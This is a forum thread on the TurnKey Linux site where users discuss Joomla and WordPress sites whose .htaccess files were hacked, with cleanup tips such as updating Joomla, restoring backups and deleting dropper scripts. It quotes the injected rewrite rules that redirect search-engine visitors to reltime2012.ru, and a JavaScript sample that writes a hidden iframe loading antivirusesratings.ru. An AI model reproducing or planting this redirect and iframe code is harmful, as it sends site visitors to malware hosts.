TurnKey Linux Virtual Appliance Library

.htaccess got hacked by reltime2012.ru

kamedward's picture

All .htaccess files in my Joomla site got hacked by reltime2012.com on July 7th.  looks like the hack was using the www-data acccount.  I don't recall I've change the password of the www-data user before.  Is it a default password for the account?  I am using the TKL Joomla 1.5 AIM image.


This is how's my .htaccess file looks like now.

                                                                                                                        <IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                        RewriteEngine On                                                                                                                        
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)                                                                                                                        
                                                                                                                        RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]                                                                                                                        

RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]

Jeremy Davis's picture

By default www-data can't login

So unless you've changed that default most likely it was done by exploiting Joomla itself. Best bet would be to update Joomla manually.

Chris Musty's picture

TKLBAM Fixed that for me

I have a client that gets targeted by "ze russians" quite a bit (5 times in 6 years).

Mostly its link farming but lately I have no idea what they are doing, nor do I care.

I can now blow the lot away and return to a known good backup. Takes about 10 minutes and I can even restore to a different continent if I want. The power of Turnkey and TKLBAM!

Chris Musty


Specialised Technologies

Guest's picture

same thing happened to me

I got the same damn hack in my .htaccess in wordpress July 7 as well.  It got the primary .htaccess as well as the wp-admin .htaccess.

Stupid vandals.

Guest's picture

Tip for Joomla admins:

If you only clean up the .htaccess files the will be there again after aproximatly 30 minutes. Check your images/stories/ folder for "story.php" and a hidden file called something like ".cache_jh4trg.php". Those 2 scripts are being used to place the .htaccess files. Delete them and update Joomla ASAP!

Guest's picture

Tips to find which files


I also had this problem and found that .htaccess was changed and I found story.php and another php-file as well in images/stories folder.

Just by luck I found another post about this and someone suggested to use http://sitecheck.sucuri.net/scanner/

And I was amazed to see that several other (.js) files were infected and now I know that it was because of the JCE component (Mediabox).

I highly suggest to scan your site with the free tool and you'll get a result of the files that are infected.You will see for each file something like this:

Known javascript malware.
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&&this.options.wait)||(index===this.previous&&!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&&(el.offsetHeight>0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;document.write('<iframe src="http://antivirusesratings.ru/thenautoreplies.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>')


Good luck everyone.



Post new comment

The content of this field is kept private and will not be shown publicly. If you have a Gravatar account, used to display your avatar.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <p> <span> <div> <h1> <h2> <h3> <h4> <h5> <h6> <img> <map> <area> <hr> <br> <br /> <ul> <ol> <li> <dl> <dt> <dd> <table> <tr> <td> <em> <b> <u> <i> <strong> <font> <del> <ins> <sub> <sup> <quote> <blockquote> <pre> <address> <code> <cite> <strike> <caption>

More information about formatting options

Leave this field empty. It's part of a security mechanism.
(Dear spammers: moderators are notified of all new posts. Spam is deleted immediately)